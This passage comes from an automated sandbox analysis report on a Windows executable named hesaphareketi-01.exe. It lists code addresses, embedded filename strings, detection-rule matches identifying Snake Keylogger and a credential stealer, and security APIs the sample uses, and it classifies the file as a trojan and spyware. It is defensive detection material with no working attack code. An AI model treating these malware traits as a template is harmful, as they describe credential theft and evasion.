            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067851339_2_06785133
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06787D009_2_06787D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678A5F09_2_0678A5F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067855C09_2_067855C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067885A09_2_067885A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067855889_2_06785588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EA0F9_2_0678EA0F
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_02BCD63C10_2_02BCD63C
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_0538E76810_2_0538E768
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_05389CA810_2_05389CA8
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_0538E75810_2_0538E758
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_0538000710_2_05380007
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_0538004010_2_05380040
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_05389C9810_2_05389C98
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_082C138010_2_082C1380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_05370D6016_2_05370D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F8D816_2_0537F8D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_053777A816_2_053777A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_05377E7816_2_05377E78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537328816_2_05373288
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C91016_2_0537C910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C90316_2_0537C903
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537090016_2_05370900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537CD6816_2_0537CD68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_05370D5016_2_05370D50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537CD5816_2_0537CD58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537D1B016_2_0537D1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537D1C016_2_0537D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F02816_2_0537F028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F01816_2_0537F018
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537000616_2_05370006
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537BC0816_2_0537BC08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F47116_2_0537F471
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C06016_2_0537C060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C05016_2_0537C050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537004016_2_05370040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C4B816_2_0537C4B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_053704A016_2_053704A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537C4A816_2_0537C4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537049116_2_05370491
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F48016_2_0537F480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_053708F016_2_053708F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537F8C916_2_0537F8C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537E32016_2_0537E320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537E31016_2_0537E310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537AF0016_2_0537AF00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537E77816_2_0537E778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537E76816_2_0537E768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537B35816_2_0537B358
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537B34816_2_0537B348
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537B7B016_2_0537B7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537B7A016_2_0537B7A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537BBF816_2_0537BBF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537EBD016_2_0537EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537EBC116_2_0537EBC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_05377E3216_2_05377E32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537D61816_2_0537D618
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_05376E0016_2_05376E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537D60916_2_0537D609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537DA7016_2_0537DA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537327816_2_05373278
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537DA6316_2_0537DA63
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537DEB816_2_0537DEB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537AEEF16_2_0537AEEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537DEC816_2_0537DEC8
            Source: hesaphareketi-01.exe, 00000000.00000000.2234522779.0000000000544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameliRg.exe" vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2285058032.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2290094241.000000000524D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.00000000041DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2279912924.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exe, 00000000.00000002.2290715875.0000000006DB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exeBinary or memory string: OriginalFilenameliRg.exe" vs hesaphareketi-01.exe
            Source: hesaphareketi-01.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: MSBuild.exe PID: 7200, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: WvaGpcFVX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, vER2EhtOHL9TLC5ieA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, vER2EhtOHL9TLC5ieA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, vER2EhtOHL9TLC5ieA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@3/3
